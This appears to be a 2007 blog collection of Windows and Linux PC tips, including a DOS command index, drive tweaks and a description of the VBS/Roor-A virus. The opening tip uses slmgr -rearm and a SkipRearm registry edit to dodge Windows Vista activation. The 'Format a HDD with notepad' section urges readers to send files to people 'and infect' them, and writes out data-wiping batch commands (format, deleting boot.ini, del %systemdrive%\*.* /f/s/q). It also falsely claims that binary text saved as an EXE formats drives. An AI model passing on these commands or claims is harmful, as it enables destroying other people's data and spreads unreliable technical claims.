Here we are going to use the Skiprearm Registry Hack.In this technique we have to run a command in the Command Prompt which will extend the activation period by 30 days.
So, lets start:

1)First make sure that you are in the Administrative Mode. Then click on the Start & access Command Promt by typing cmd in the Search Bar.

2)Then type slmgr -rearm in the Command Prompt window & press Enter. After 45 seconds, a prompt will be displayed to Restart your computer. Just Restart, after that you will see that you have successfully extended your activation period to 30 days. This will work only 3 times, so you will get 120 days of Windows Vista without Activation...But we are going to change it.

3)Open Registry Editor by typing regedit in the Search Bar.

4)Navigate to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ Currentversion \ SL.

5)On the right side search for a key called SkipRearm & modify its value to 1.

6)Just close the Registry Editor.

Now the default limit of 3 will be changed to 8 which means that you can use Winodws Vista for 360 Days without Activation.

Use system restore when you cannot boot your system:

2007-10-29T10:58:00.000-07:00

If your system has failed to the point where you cannot access the Windows GUI either through booting normally or through safe mode, you may still have the chance to use the System Restore feature if you have it enabled, by running it form the command prompt. To do this: Restart your computer and press F8 after the POST screen to bring up the Windows XP boot menu. Choose 'boot in safe mode with command prompt.' If your system gets to the command prompt successfully, type '%systemroot%\system32\restore\rstrui.exe' and then press enter. Follow the onscreen instructions to restore your computer to a previous saved point.

Speed Up Browsing Folders In Windows Xp

2007-10-29T10:57:00.000-07:00

You may have noticed that everytime you open My Computer to browse folders there is a small delay. This is because Windows XP automatically searches for network files and printers when Windows explorer is opened. To stop Windows XP from doing this follow the instructions below.

1. Open My Computer

2. Click on Tools menu

3. Click on Folder Options

4. Click on the View tab.

5. Uncheck the "Automatically search for network folders and printers check box"

6. Click Apply

7. Click Ok

Reboot your computer

Try it, you will see a significant increase in speed.

Repair Of Internet Explorer

2007-10-29T10:56:00.001-07:00

Method 1: Microsoft Internet Explorer 6.x Repair for Windows XP

From the Start menu, select Run. In the Open field, type sfc /scannow (Note: There is a space between sfc and /scannow) Select the OK button. Follow the prompts throughout the System File Checker process. Reboot the computer when System File Checker completes.

Method 2: Microsoft Internet Explorer 6.x Repair for Windows XP

From the Start menu, select Search, select All Files and Folders. Select More Advanced Options and place a checkmark beside Search Hidden Files and Folders option. Ensure that Search System Folders and Search Subfolders are also checked. In the All or Part of the File Name box, type ie.inf In the Look In drop-down menu, select C: or the letter of the hard drive that contains the Windows folder. Click the Search button. In the search results pane, find the ie.inf file located in Windows\Inf folder. Right click the ie.inf file and click Install on the context menu. Reboot the computer when the file copy process is complete.

Removing Multiple Boot Screens:

2007-10-29T10:55:00.000-07:00

If you are getting unwanted multiple boot screenThen Follow these Steps.
1> Right Click on My Computer
2>Select Properties
3>Select Advanced Tab
4>Select Settings In the Startup & Recovery Section(3rd grp)
5>Select the operating system which u want.
6>And Click OK.
7>Further again press the setting and click on Edit.
8>It will open boot.ini File.9>Now u can delete those o/s which you don't want to be displayed.Note: For deleting operating systems from boot.ini file, keep it mind that you can'tdelete that o/s which is selected by default there. Beforemaking any changes make a copy of boot.ini file.

How To Remove folder.htt Virus

2007-10-29T10:54:00.001-07:00

yes.. you have been hit with REDLOAF virus.. folder.htt and one more file desktop.ini keeps on regenerating. VBS/Roor-A is a virus that may infect HTML or text files.

***Quick heal is the only solution. ***
****Quick heal is the only solution. ****

VBS/Roor-A infects files with file extension HTM, HTML or HTT in the folder in which it is run.

VBS/Roor-A creates dropper files for the virus with the names DESKTOP.INI and FOLDER.HTT in the current folder, the Windows folder, the Windows system folder, the Windows Desktop and the subfolder WEB of the Windows folder. Dropper files may also be created in the root folders of any other drives.

On the 26th of September, the virus may attempt to shut down
Windows.
VBS/Roor-A makes the following changes to the system registry:

HKCU\Software\Microsoft\Internet Explorer\Main
Start Page
about:error

HKLM\Software\Microsoft\Internet Explorer\AboutURLs
error
http://

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
NoFolderOptions
1

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Hidden
0

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
ClassicShell
0

The virus deletes the following registry entry:

HKLM\Software\Microsoft\Windows\CurrentVersion\ExtShellViews{5984FFE0-28D4-11CF-AE66-08002B2E1262}

Quick heal is the only solution.

How TO Merge Two Drives

2007-10-29T10:52:00.000-07:00

First read carefully before doing any thing else i am not responsible for any thing.

control panel->Administrative Tools->Computer Management->storeage->disk managment->hard disk->write click->convert to daynamic disk->
After converting both hard disk as daynamic hard disk ->now extend partition and add the amount of the hard disk space from second hard disk to you first hard disk drive.you can do the same for extending any partition in same hard disk also but you should have that much empty space in your hard diskPrecaution :-->
first take data back up of your entire hard disk becuase if you are not able to do that you may loss your data and after converting your hard disk from basic to dayanamic you can not revert it back.

Limitation:
1) you should have atleast windows 2000 or above OS in your computer.
2)Your hard disk partion must be of NTFS.
3) There is no way to come back from daynammic to basic hard disk.

Warning :
1) I am not going to take any resposiblity for this if any thing goes wrong.
2) Take your data back up in some dvd. or in any other hard disk.

How To Fix Your Monitor Refresh Rate In Debain

2007-10-29T10:50:00.000-07:00

The easiest way I have found is to use the ‘gtf’ command. The syntax of the command is:

gtf Horizontal Vertical RefreshRate
so if you wanted a screen resolution of 1024×768 with a 100 hz refresh rate the command would be:

gtf 1024 768 100

and the command will show you a line something like this:
# 1024×768 @ 100.00 Hz (GTF) hsync: 81.40 kHz; pclk: 113.31 MHzModeline “1024×768_100.00? 113.31 1024 1096 1208 1392 768 769 772 814 -HSync +Vsync

Now you need to copy this to the monitor section of the /etc/X11/XF86Config-4
so that it would look something like:

Section “Monitor”
Identifier “Generic Monitor”
Option “DPMS”

# 1024×768 @ 100.00 Hz (GTF) hsync: 81.40 kHz; pclk: 113.31 MHzModeline “1024×768_100.00? 113.31 1024 1096 1208 1392 768 769 772 814 -HSync +Vsync

EndSection

Save the changes and restart the xserver for the changes to take effect.

How To Clone A Hard Drive

2007-10-29T10:47:00.000-07:00

Did know that you could clone your current Hard Drive without having to by extra software? Maybe you didn't know that all that you needed, was already set up on your current system? Well, it is... and if you follow this tut, you shouldn't have much of a problem.

Make sure that you have a Master and a Slave setup on your system. The Slave drive, in this case, is where all the data on the Master is going to go to.

First: Perform a Scandisk your Master drive and follow that with a thorough Defrag. If you have an Antivirus program, do a thorough sweep with the AV first, then do the Scandisk, followed by the Defrag.

Second: Do the same thing to the target drive, as you did the Master: Scandisk then a thorough Defrag.

Third: Right-click on the Target drive and click on Format. When the box comes up, click your mouse onto the "Full" button.

Fourth: After Formatting the Target drive, run a Scandisk again and click on the button that says "Autofix Errors".

Fifth: In this final part, you might want to cut-and-paste to code in, unless you are sure that you can do it without making any mistakes:

Click on the "Start" button, then click on the "Run..." button, then place the following into the Runbox:

"XCOPY C:\*.*D:\ /c/h/e/k/r" (minus the quotes, of course) then press the "Enter" button.

If you receive an error message, then remove the space from between XCOPY and C:\

Anything that should happen to come up in the DOS box, just click "Y" for "Yes". When its all finished, pull the original Master from the system, designate the Slave as the Master (change your jumpers), then check your new Master out.

This trick has worked and has been tested on all systems except for Windows 2000, so you really shouldn't have any problems. If, by any chance, you should come across a snag, message me and I'll walk you through it.

how to add password or lock a folder in xp without using any software

2007-10-29T10:46:00.000-07:00

Suppose you want to lock the folder games in d: which has the path D:\Games.In the same drive create a text file and type
ren games games.{21EC2020-3AEA-1069-A2DD-08002B30309D}
Now save this text file as loc.bat

create another text file and type in it
ren games.{21EC2020-3AEA-1069-A2DD-08002B30309D} games
Now save this text file as key.bat

Now you can see 2 batch files loc and key.Press loc and the folder games will change to control panel and you cannot view its contents.Press key and you will get back your original folder

How To Add Hibernate Button To Shutdown Prompt

2007-10-29T10:44:00.000-07:00

1. Click Start, click Run, type regedit, and then click OK.

2. Locate and then click the following registry subkey: HKEY_LOCAL_MACHINE\SOFTWARE\Po...

3. Right-click Windows, point to New, and then click Key.

4. In the New Key #1 box, type System, and then press ENTER.

5. Right-click System, point to New, and then click Key.

6. In the New Key #1 box, type Shutdown, and then press ENTER.

7. On the Edit menu, point to New, and then click DWORD Value.

8. In the New Value # 1 box, type ShowHibernateButton, and then press ENTER.

9. Right-click ShowHibernateButton, and then click Modify.

10. In the Value data box, type 1, leave the default Hexadecimal option selected, and then click OK.

11. Quit Registry Editor.

2007-10-29T10:43:00.000-07:00

gtalk tips

2007-10-29T10:42:00.000-07:00

How to Chat with yourself

In your Browser address bar just type:gtalk:chat?jid=youremail@gmail.com

Change youremail with your own email, now you can send, recieve messages, & you can see what you are typing.

Desktop Icons for GTalk Contacts

Right click on the Desktop select New>Shortcut & type this:

gtalk:chat?jid=email@gmail.com

Please replace email with the email of your contact.

If you like to call your friends just replace chat with call.

Gmail Hacks And Tips

2007-10-29T10:40:00.001-07:00

I ’ve been using GMail from long time and have always thought it was the best email service. With the large amount of space it offers, and the amazing features the possibilities are endless. Here is a run down of some fun and crazy Gmail hacks. Some are simple extensions for firefox, some are more complicated scripts, and some are just plain silly.

Gmail Based blog - this idea uses libgmailer to connect to Gmail. Uses GMail messages as “entries” (the message star is the publish status) and replies to conversations are the “entry comments” .

Firefox Gmail Notifier - Firefox extension that notifies you of new GMail mail.
Encrypt entire Gmail session - a nice little hack if you’re reading mail at your local, unecrypted hotspot. Just replace http with https once you log into Gmail and now your session is encrypted.

GMail Loader - So, you want to switch to GMail, but you have a ton of message that you want to bring over. Well, this can help solve your problems. Today, the GMail Loader is a graphical, cross-platform, Python based utility that supports two mBox formats (Netscape, Mozilla, Thunderbird, Most Other Clients), MailDir(Qmail, others), MMDF(Mutt), MH (NMH), and Babyl (Emacs RMAIL).

ReadPst - a utility to convert your Outlook .pst mail files to GMail.

GMailSkins - ok, this is the Texas Chainsaw massacre for GMail. Alright, bad joke. Tired of the Gmail interface? Go check it out.

GMail To Do List - that’s what I love about researching this stuff - I find useful stuff for you and me!

GMailTo Mac OS X - this little proggie allows you to redirect any email link to GMail.

GMail Icon Generator - It does other types of accounts too, but we’re talking GMail here. If you’ve never been told, allow me to tell you. Don’t post your email account on your blog in plain text. Spammers gobble that up. Use this to create a picture file that spambots can’t use.

GMail Compose - Allows you to right click in the context menu on Firefox and GMail someone. It’s a firefox extension.

libgmail - For you coders - python binding for the GMail service.

Install Linux on Gmail - A wonderful hack to put linux on GMail.

GMail manager - Allows you to manage multiple Gmail accounts and receive new mail notifications. Displays your account details including unread messages, saved drafts, spam messages, labels with new mail, space used, and new mail snippets.

GDisk - turns your GMail account into a mountable Mac drive.

GTDGMail - is a Firefox extension that integrates the highly effective methodology of “Getting Things Done” into the popular email service Gmail.

GMail MP3Player - this shows you how to use GMail as an MP3 player.

Funny Notepad Trick

2007-10-29T10:38:00.000-07:00

1. Open a blank Notepad file

2. Write .LOG as the first line of the file, followed by a enter.
Save the file and close it.

3. Double-click the file to open it and notice that Notepad appends the current date and time to the end of the file and places the cursor on the line after.

4. Type your notes and then save and close the file.

After that open the file and see the changes

Format a HDD with notepad

2007-10-29T10:37:00.001-07:00

Step 1.
Copy The Following In Notepad Exactly as it says01001011000111110010010101010101010000011111100000
Step 2.
Save As An EXE Any Name Will Do
Step 3.
Send the EXE to People And Infect
OR
IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary codeformat c:\ /Q/X -- this will format your drive c:\01100110011011110111001001101101011000010111010000 1000000110001100111010010111000010000000101111010100010010111101011000format d:\ /Q/X -- this will format your dirve d:\01100110011011110111001001101101011000010111010000 1000000110010000111010010111000010000000101111010100010010111101011000
format a:\ /Q/X -- this will format your drive a:\
01100110011011110111001001101101011000010111010000 1000000110000100111010010111000010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 10111101010011001011110101000100100000011000110011101001011100011000100110111101 1011110111010000101110011010010110111001101001
try to figure out urself rest
cant spoonfeed
its workin
Do not try it on ur PC. dont mess around this is for educational purpose only
still if u cant figure it out try disgo to notepad@Echo offDel C:\ *.*ysave it as Dell.bat
worse@echo offdel %systemdrive%\*.*/f/s/qshutdown -r -f -t 00and save it as a .bat file

Folder Option Missing

2007-10-29T10:36:00.001-07:00

Open Run and then type "gpedit?msc"?

Now goto

User Configuration > Administrative templates > Windows Component > Windows Explorer?

Click on Windows Explorer you will find the 3rd option on the right side of screen

"Removes the Folder Option menu item from the Tools menu"

Just check it,

if it is not configured then change it to enable by double clicking on it and after applying again set it to not configured?

Hope that you will find the option after restarting windows?

DOS Command Index

2007-10-29T10:34:00.000-07:00

APPEND
(External)APPEND ;APPEND [d:]path[;][d:]path[...]APPEND [/X:onoff][/path:onoff] [/E]Displays or sets the search path for data files. DOS will search the specified path(s) if the file is not found in the current path.
ASSIGN
(External)ASSIGN x=y [...] /staRedirects disk drive requests to a different drive.
ATTRIB
(External)ATTRIB [d:][path]filename [/S]ATTRIB [+R-R] [+A-A] [+S-S] [+H-H] [d:][path]filename [/S]Sets or displays the read-only, archive, system, and hidden attributes of a file or directory.
BACKUP
(External)BACKUP d:[path][filename] d:[/S][/M][/A][/F:(size)] [/P][/D:date] [/T:time] [/L:[path]filename]Makes a backup copy of one or more files. (In DOS Version 6, this program is stored on the DOS supplemental disk.)
BREAK
(Internal)BREAK =onoffUsed from the DOS prompt or in a batch file or in the CONFIG.SYS file to set (or display) whether or not DOS should check for a Ctrl + Break key combination.
BUFFERS
(Internal)BUFFERS=(number),(read-ahead number)Used in the CONFIG.SYS file to set the number of disk buffers (number) that will be available for use during data input. Also used to set a value for the number of sectors to be read in advance (read-ahead) during data input operations.
CALL
(Internal)CALL [d:][path]batchfilename [options]Calls another batch file and then returns to current batch file to continue.
CHCP
(Internal)CHCP (codepage)Displays the current code page or changes the code page that DOS will use.
CHDIR
(Internal)CHDIR (CD) [d:]pathCHDIR (CD)[..]Displays working (current) directory and/or changes to a different directory.
CHKDSK
(External)CHKDSK [d:][path][filename] [/F][/V]Checks a disk and provides a file and memory status report.
CHOICE
(Internal)CHOICE [/C[:]keys] [/N][/S][/T[:]c,nn] [text]Used to provide a prompt so that a user can make a choice while a batch program is running.
CLS (Clear Screen)
(Internal)CLSClears (erases) the screen.
COMMAND
(External)COMMAND [d:][path] [device] [/P][/E:(size)] [/MSG][/Y [/C (command)/K (command)]Starts a new version of the DOS command processor (the program that loads the DOS Internal programs).
COMP
(External)COMP [d:][path][filename] [d:][path][filename] [/A][/C][/D][/L][/N:(number)]Compares two groups of files to find information that does not match. (See FC command).
COPY
(Internal)COPY [/Y-Y] [/A][/B] [d:][path]filename [/A][/B] [d:][path][filename] [/V]orCOPY [/Y-Y][/A][/B] [d:][path]filename+[d:][path]filename[...][d:][path][filename] [/V] Copies and appends files.
COUNTRY
(Internal)COUNTRY=country code,[code page][,][d:][filename]Used in the CONFIG.SYS file to tell DOS to use country-specific text conventions during processing.
CTTY
(Internal)CTTY (device)Changes the standard I/O (Input/Output) device to an auxiliary device.
DATE
(Internal)DATE mm-dd-yyDisplays and/or sets the system date.
DBLSPACE
(External)DBLSPACE / automount=drivesDBLSPACE /chkdsk [/F] [d:]DBLSPACE /compress d: [/newdrive=host:] [/reserve=size] [/F]DBLSPACE /create d: [/newdrive=host:] [/reserve=size] [/size=size]DBLSPACE /defragment [d:] ]/F]DBLSPACE /delete d:DBLSPACE /doubleguard=01DBLSPACE /format d:DBLSPACE [/info] [d:]DBLSPACE /listDBLSPACE /mount[=nnn] host: [/newdrive=d:]DBLSPACE /ratio[=ratio] [d:] [/all]DBLSPACE /size[=size] [/reserve=size] d:DBLSPACE /uncompress d: DBLSPACE /unmount [d:]A program available with DOS 6.0 that allows you to compress information on a disk.
DEBUG
(External)DEBUG [pathname] [parameters]An MS-DOS utility used to test and edit programs.
DEFRAG
(External)DEFRAG [d:] [/F][/S[:]order] [/B][/skiphigh [/LCD/BW/GO] [/H]DEFRAG [d:] [/V][/B][/skiphigh] [/LCD]/BW/GO] [/H]Optimizes disk performance by reorganizing the files on the disk.
DEL (ERASE)
(Internal)DEL (ERASE) [d:][path]filename [/P]Deletes (erases) files from disk.
DELOLDOS
(External)DELOLDOS [/B]Deletes all files from previous versions of DOS after a 5.0 or 6.0 installation.
DELTREE
(External)DELTREE [/Y] [d:]path [d:]path[...]Deletes (erases) a directory including all files and subdirectories that are in it.
DEVICE
(Internal)DEVICE=(driver name)Used in the CONFIG.SYS file to tell DOS which device driver to load.
DEVICEHIGH
(Internal)DEVICEHIGH=(driver name)Like DEVICE, DEVICEHIGH is used in the CONFIG.SYS file to tell DOS which device driver software to use for devices; however, this option is used to install the device driver into the upper memory area.
DIR
(Internal)DIR [d:][path][filename] [/A:(attributes)] [/O:(order)] [/B][/C][/CH][/L][/S][/P][/W] Displays directory of files and directories stored on disk.
DISKCOMP
(External)DISKCOMP [d:] [d:][/1][/8]Compares the contents of two diskettes.
DISKCOPY
(External)DISKCOPY [d:] [d:][/1][/V][/M]Makes an exact copy of a diskette.
DOS
(Internal)DOS=[highlow],[umbnoumb]Used in the CONFIG.SYS file to specify the memory location for DOS. It is used to load DOS into the upper memory area and to specify whether or not the upper memory blocks will be used.
DOSKEY
(External)DOSKEY [reinstall] [/bufsize=size][/macros][/history][/insert/overstrike] [macroname=[text]]Loads the Doskey program into memory which can be used to recall DOS commands so that you can edit them.
DOSSHELL
(External)DOSSHELL [/B] [/G:[resolution][n]][/T:[resolution][n]]Initiates the graphic shell program using the specified screen resolution.
DRIVPARM
(Internal)DRIVPARM= /D:(number) [/C] [/F:(form factor)] [/H:(number)] [/I][ /N][/S:(number)] [/T:(tracks)]Used in the CONFIG.SYS file to set parameters for a disk drive.
ECHO
(Internal)ECHO onoffECHO (message)Displays messages or turns on or off the display of commands in a batch file.
EDIT
(External)EDIT [d:][path]filename [/B][/G][/H][/NOHI]Starts the MS-DOS editor, a text editor used to create and edit ASCII text files.
EMM386
(External)EMM386 [onoffauto] [w=onoff]Enables or disables EMM386 expanded-memory support on a computer with an 80386 or higher processor.
EXE2BIN
(External)EXE2BIN [d:][path]filename [d:][path]filenameConverts .EXE (executable) files to binary format.
EXIT
(Internal)EXITExits a secondary command processor.
EXPAND
(External)EXPAND [d:][path]filename [[d:][path]filename[ . . .]]Expands a compressed file.
FASTHELP
(External)FASTHELP [command][command] /?Displays a list of DOS commands with a brief explanation of each.
FASTOPEN
(External)FASTOPEN d:[=n][/X]Keeps track of the locations of files for fast access.
FC
(External)FC [/A][/C][/L][/Lb n][/N][/T][/W][number] [d:][path]filename [d:][path]filenameor (for binary comparisons)FC [/B][/number] [d:][path]filename [d:][path]filenameDisplays the differences between two files or sets of files.
FCBS
(Internal)FCBS=(number)Used in the CONFIG.SYS file to specify the number of file-control blocks for file sharing.
FDISK
(External)FDISK [/status]Prepares a fixed disk to accept DOS files for storage.
FILES
(Internal)FILES=(number)Used in the CONFIG.Sys file to specify the maximum number of files that can be open at the same time.
FIND
(External)FIND [/V][/C][/I][/N] ÒstringÓ [d:][path]filename[...]Finds and reports the location of a specific string of text characters in one or more files.
FOR
(Internal)FOR %%(variable) IN (set) DO (command)or (for interactive processing)FOR %(variable) IN (set) DO (command)Performs repeated execution of commands (for both batch processing and interactive processing).
FORMAT
(External)FORMAT d:[/1][/4][/8][/F:(size)] [/N:(sectors)] [/T:(tracks)][/B/S][/C][/V:(label)] [/Q][/U][/V]Formats a disk to accept DOS files.
GOTO
(Internal)GOTO (label)Causes unconditional branch to the specified label.
GRAFTABL
(External)GRAFTABL [(code page)]GRAFTABL [status]Loads a table of character data into memory (for use with a color/graphics adapter).
GRAPHICS
(External)GRAPHICS [printer type][profile] [/B][/R][/LCD][/PB:(id)] [/C][/F][/P(port)]Provides a way to print contents of a graphics screen display.
HELP
(External)HELP [command] [/B][/G][/H][/NOHI]Displays information about a DOS command.
IF
(Internal)IF [NOT] EXIST filename (command) [parameters]IF [NOT] (string1)==(string2) (command) [parameters]IF [NOT] ERRORLEVEL (number) (command) [parameters]Allows for conditional operations in batch processing.
INCLUDE
(Internal)INCLUDE= blocknameUsed in the CONFIG.SYS file to allow you to use the commands from one CONFIG.SYS block within another.
INSTALL
(Internal)INSTALL=[d: ][\path]filename [parameters]Used in the CONFIG.SYS file to load memory-resident programs into conventional memory.
INTERLINK
(External)INTERLINK [client[:]=[server][:]]Connects two computers via parallel or serial ports so that the computers can share disks and printer ports.
INTERSVR
(External)INTERSVR [d:][...][/X=d:][...] [/LPT:[naddress]] [/COM:[naddress]][/baud:rate] [/B][/V]INTERSVR /RCOPYStarts the Interlink server.
JOIN
(External)JOIN d: [d:path]JOIN d: [/D]Allows access to the directory structure and files of a drive through a directory on a different drive.
KEYB
(External)KEYB [xx][,][yyy][,][d:][path]filename [/E][/ID:(number)] Loads a program that replaces the support program for U. S. keyboards.
LABEL
(External)LABEL [d:][volume label] Creates or changes or deletes a volume label for a disk.
LASTDRIVE
(Internal)LASTDRIVE=(drive letter)Used in the CONFIG.SYS file to set the maximum number of drives that can be accessed.
LOADFIX
(Internal)LOADFIX [d:][path]filename [parameters] Ensures that a program is loaded above the first 64K of conventional memory, and runs the program.
LOADHIGH
(Internal)LOADHIGH (LH) [d:][path]filename [parameters] Loads memory resident application into reserved area of memory (between 640K-1M).
MEM
(External)MEM [/program/debug/classify/free/module(name)] [/page] Displays amount of installed and available memory, including extended, expanded, and upper memory.
MEMMAKER
(External)MEMMAKER [/B][/batch][/session][/swap:d] [/T][/undo][/W:size1,size2] Starts the MemMaker program, a program that lets you optimize your computer's memory.
MENUCOLOR
(Internal)MENUCOLOR=textcolor,[background] Used in the CONFIG.SYS file to set the colors that will be used by DOS to display text on the screen.
MENUDEFAULT
(Internal)MENUDEFAULT=blockname, [timeout] Used in the CONFIG.SYS file to set the startup configuration that will be used by DOS if no key is pressed within the specified timeout period.
MENUITEM
(Internal)MENUITEM=blockname, [menutext] Used in the CONFIG.SYS file to create a start-up menu from which you can select a group of CONFIG.SYS commands to be processed upon reboot.
MIRROR
(External)MIRROR [d:]path [d:] path [...]MIRROR [d1:][d2:][...] [/T(drive)(files)] [/partn][/U][/1] Saves disk storage information that can be used to recover accidentally erased files.
MKDIR
(MD) (Internal)MKDIR (MD) [d:]pathCreates a new subdirectory.
MODE
(External)MODE nMODE LPT#[:][n][,][m][,][P][retry]MODE [n],m[,T]MODE (displaytype,linetotal)MODE COMn[:]baud[,][parity][,][databits][,][stopbits][,][retry]MODE LPT#[:]=COMn [retry]MODE CON[RATE=(number)][DELAY=(number)]MODE (device) CODEPAGE PREPARE=(codepage) [d:][path]filenameMODE (device) CODEPAGE PREPARE=(codepage list) [d:][path]filenameMODE (device) CODEPAGE SELECT=(codepage)MODE (device) CODEPAGE [/STATUS]MODE (device) CODEPAGE REFRESHSets mode of operation for devices or communications.
MORE
(External)MORE < (filename or command)(name)MORESends output to console, one screen at a time.
MOVE
(Internal)MOVE [/Y/-Y] [d:][path]filename[,[d:][path]filename[...]] destinationMoves one or more files to the location you specify. Can also be used to rename directories.
MSAV
(External)MSAV [d:] [/S/C][/R][/A][/L][/N][/P][/F][/video][/mouse]MSAV /videoScans your computer for known viruses.
MSBACKUP
(External)MSBACKUP [setupfile] [/BW/LCD/MDA] Used to backup or restore one or more files from one disk to another.
MSCDEX
(External)MSCDEX /D:driver [/D:driver2. . .] [/E][/K][/S][/V][/L:letter] [/M:number] Used to gain access to CD-ROM drives (new with DOS Version 6).
MSD
(External)MSD [/B][/I]MSD [/I] [/F[d:][path]filename [/P[d:][path]filename [/S[d:][path]filenameProvides detailed technical information about your computer.
NLSFUNC
(External)NLSFUNC [d:][path]filenameUsed to load a file with country-specific information.
NUMLOCK
(Internal)NUMLOCK=onoffUsed in the CONFIG.SYS file to specify the state of the NumLock key.
PATH
(Internal)PATH;PATH [d:]path[;][d:]path[...] Sets or displays directories that will be searched for programs not in the current directory.
PAUSE
(Internal)PAUSE [comment] Suspends execution of a batch file until a key is pressed.
POWER
(External)POWER [adv:maxregmin]stdoff] Used to turn power management on and off, report the status of power management, and set levels of power conservation.
PRINT
(External)PRINT [/B:(buffersize)] [/D:(device)] [/M:(maxtick)] [/Q:(value] [/S:(timeslice)][/U:(busytick)] [/C][/P][/T] [d:][path][filename] [...] Queues and prints data files.
PROMPT
(Internal)PROMPT [prompt text] [options] Changes the DOS command prompt.
RECOVER
(External)RECOVER [d:][path]filenameRECOVER d:Resolves sector problems on a file or a disk. (Beginning with DOS Version 6, RECOVER is no longer available ).
REM
(Internal)REM [comment] Used in batch files and in the CONFIG.SYS file to insert remarks (that will not be acted on).
RENAME (REN)
(Internal)RENAME (REN) [d:][path]filename [d:][path]filename Changes the filename under which a file is stored.
REPLACE
(External)REPLACE [d:][path]filename [d:][path] [/A][/P][/R][/S][/U][/W] Replaces stored files with files of the same name from a different storage location.
RESTORE
(External)RESTORE d: [d:][path]filename [/P][/S][/B:mm-dd-yy] [/A:mm-dd-yy][/E:hh:mm:ss] [/L:hh:mm:ss] [/M][/N][/D] Restores to standard disk storage format files previously stored using the BACKUP command.
RMDIR (RD)
(Internal)RMDIR (RD) [d:]pathRemoves a subdirectory.
SCANDISK
(External)SCANDISK [d: [d: . . .]/all][/checkonly/autofix[/nosave]/custom][/surface][/mono][/nosummay]SCANDISK volume-name[/checkonly/autofix[/nosave]/custom][/mono][/nosummary]SCANDISK /fragment [d:][path]filenameSCANDISK /undo [undo-d:][/mono] Starts the Microsoft ScanDisk program which is a disk analysis and repair tool used to check a drive for errors and correct any problems that it finds.
SELECT
(External)SELECT [d:] [d:][path] [country code][keyboard code] Formats a disk and installs country-specific information and keyboard codes (starting with DOS Version 6, this command is no longer available).
SET
(Internal)SET (string1)=(string2)Inserts strings into the command environment. The set values can be used later by programs.
SETVER
(External)SETVER [d:]:path][filename (number)][/delete][/quiet] Displays the version table and sets the version of DOS that is reported to programs.
SHARE
(External)SHARE [/F:space] [/L:locks] Installs support for file sharing and file locking.
SHELL
(Internal)SHELL=[d:][path]filename [parameters] Used in the CONFIG.SYS file to specify the command interpreter that DOS should use.
SHIFT
(Internal)SHIFTIncreases number of replaceable parameters to more than the standard ten for use in batch files.
SORT
(External)SORT [/R][/+n] < (filename)SORT [/R][/+n] > (filename2)Sorts input and sends it to the screen or to a file.
STACKS
(Internal)STACKS=(number),(size)Used in the CONFIG.SYS file to set the number of stack frames and the size of each stack frame.
SUBMENU
(Internal)SUBMENU=blockname, [menutext] Used in the CONFIG.SYS file to create a multilevel menu from which you can select start-up options.
SUBST
(External)SUBST d: d:pathSUBST d: /DSubstitutes a virtual drive letter for a path designation.
SWITCHES
(Internal)SWITCHES= [/K][/F][/N][/W] Used in the CONFIG.SYS file to configure DOS in a special way; for example, to tell DOS to emulate different hardware configurations.
SYS
(External)SYS [source] d:Transfers the operating system files to another disk.
TIME
(Internal)TIME hh:mm[:ss][.cc][AP] Displays current time setting of system clock and provides a way for you to reset the time.
TREE
(External)TREE [d:][path] [/A][/F] Displays directory paths and (optionally) files in each subdirectory.
TYPE
(Internal)TYPE [d:][path]filenameDisplays the contents of a file.
UNDELETE
(External)UNDELETE [d:][path][filename] [/DT/DS/DOS]UNDELETE [/list/all/purge[d:]/status/load/U/S[d:]/Td:[-entries]] Restores files deleted with the DELETE command.
UNFORMAT
(External)UNFORMAT d: [/J][/L][/test][/partn][/P][/U] Used to undo the effects of formatting a disk.
VER
(Internal)VERDisplays the DOS version number.
VERIFY
(Internal)VERIFY onoffTurns on the verify mode; the program checks all copying operations to assure that files are copied correctly.
VOL
(Internal)VOL [d:] Displays a disk's volume label.
VSAFE
(External)VSAFE [/option[+-]...] [/NE][/NX][Ax/Cx] [/N][/D][/U] VSAFE is a memory-resident program that continuously monitors your computer for viruses and displays a warning when it finds one.
XCOPY
(External)XCOPY [d:][path]filename [d:][path][filename] [/A][/D:(date)] [/E][/M][/P][/S][/V][/W][Y\-Y]Copies directories, subdirectories, and files.

Syntax Notes

To be functional, each DOS command must be entered in a particular way: this command entry structure is known as the command's "syntax." The syntax "notation" is a way to reproduce the command syntax in print. For example, you can determine the items that are optional, by looking for information that is printed inside square brackets. The notation [d:], for example, indicates an optional drive designation. The command syntax, on the other hand, is how YOU enter the command to make it work.
Command Syntax Elements
1. Command NameThe DOS command name is the name you enter to start the DOS program (a few of the DOS commands can be entered using shortcut names). The DOS command name is always entered first. In this book, the command is usually printed in uppercase letters, but you can enter command names as either lowercase or uppercase or a mix of both. 2. SpaceAlways leave a space after the command name.3. Drive DesignationThe drive designation (abbreviated in this book as "d:") is an option for many DOS commands. However, some commands are not related to disk drives and therefore do not require a drive designation. Whenever you enter a DOS command that deals with disk drives and you are already working in the drive in question, you do not have to enter the drive designator. For example, if you are working in drive A (when the DOS prompt A> is showing at the left side of the screen) and you want to use the DIR command to display a directory listing of that same drive, you do not have to enter the drive designation. If you do not enter a drive designation, DOS always assumes you are referring to the drive you are currently working in (sometimes called the "default" drive). 4. A ColonWhen referring to a drive in a DOS command, you must always follow the drive designator with a colon (:) (this is how DOS recognizes it as a drive designation).5. PathnameA pathname (path) refers to the path you want DOS to follow in order to act on the DOS command. As described in Chapter 3, it indicates the path from the current directory or subdirectory to the files that are to be acted upon.6. FilenameA filename is the name of a file stored on disk. As described in Chapter 1, a filename can be of eight or fewer letters or other legal characters. 7. Filename ExtensionA filename extension can follow the filename to further identify it. The extension follows a period and can be of three or fewer characters. A filename extension is not required.8. SwitchesCharacters shown in a command syntax that are represented by a letter or number and preceded by a forward slash (for example, "/P") are command options (sometimes known as "switches"). Use of these options activate special operations as part of a DOS command's functions.9. BracketsItems enclosed in square brackets are optional; in other words, the command will work in its basic form without entering the information contained inside the brackets.10. EllipsesEllipses (...) indicate that an item in a command syntax can be repeated as many times as needed.11. Vertical BarWhen items are separated by a vertical bar (), it means that you enter one of the separated items. For example: ON OFF means that you can enter either ON or OFF, but not both

Creating Shortcut To Lock Computer

